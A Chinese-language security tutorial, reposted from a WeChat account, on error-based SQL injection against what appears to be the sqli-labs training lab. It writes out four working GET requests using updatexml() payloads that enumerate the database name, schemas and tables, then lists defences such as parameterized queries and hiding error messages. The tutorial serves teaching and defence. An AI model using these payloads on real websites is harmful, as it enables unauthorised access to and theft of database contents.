Sql注入 报错注入攻击

admin 2023年9月6日10:40:52评论18 views字数 918阅读3分3秒阅读模式
往期内容
SQL注入 -- Union联合注入漏洞
SQL注入 -- Boolean注入攻击

一、报错注入的原理
报错注入是一种利用数据库在执行恶意 SQL 语句时生成错误信息的方法。攻击者试图构造恶意 SQL 查询,以便服务器返回包含有关数据库结构或数据的错误信息。攻击者可以利用这些错误信息来进一步攻击目标系统。
二、报错注入的步骤
1、故意构造错误的参数,使网站报错
GET /sqli/Less-2/?id=1' HTTP/1.1

Sql注入  报错注入攻击

2、利用updatexml()数据库名称
GET /sqli/Less-2/?id=-1+and+(updatexml(1,concat(0x7e,database(),0x7e),0))--+ HTTP/1.1

Sql注入  报错注入攻击

3、获取所有的数据库名
GET /sqli/Less-2/?id=-1+and+(updatexml(1,concat(0x7e,(select+schema_name+from+information_schema.schemata+limit+4,1),0x7e),1))--+ HTTP/1.1

Sql注入  报错注入攻击

4、通过数据库名获取表名
GET /sqli/Less-2/?id=-1+and+(updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema='security'+limit+3,1),0x7e),1))--+ HTTP/1.1

Sql注入  报错注入攻击

三、防御报错注入的方法
输入验证和过滤:对于所有用户输入,都要进行严格的验证和过滤。确保只允许预期的数据类型和格式进入查询。
最小化错误信息:在生产环境中,不要向用户披露详细的错误信息。错误信息应该被记录并报告给管理员,而不是直接显示给用户。
使用参数化查询:使用参数化的 SQL 查询可以有效防止报错注入攻击。大多数编程语言和框架都支持参数化查询,这样数据库会自动处理输入的转义,不会将其作为代码执行。
审计和监控:定期审计数据库的安全性,监控数据库活动以及异常情况。




关 注 有 礼



欢迎关注公众号:小酒馆文案

获取包邮送书抽奖码

原文始发于微信公众号(Web安全工具库):Sql注入 -- 报错注入攻击

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月6日10:40:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Sql注入 报错注入攻击https://cn-sec.com/archives/2010805.html

发表评论

匿名网友 填写信息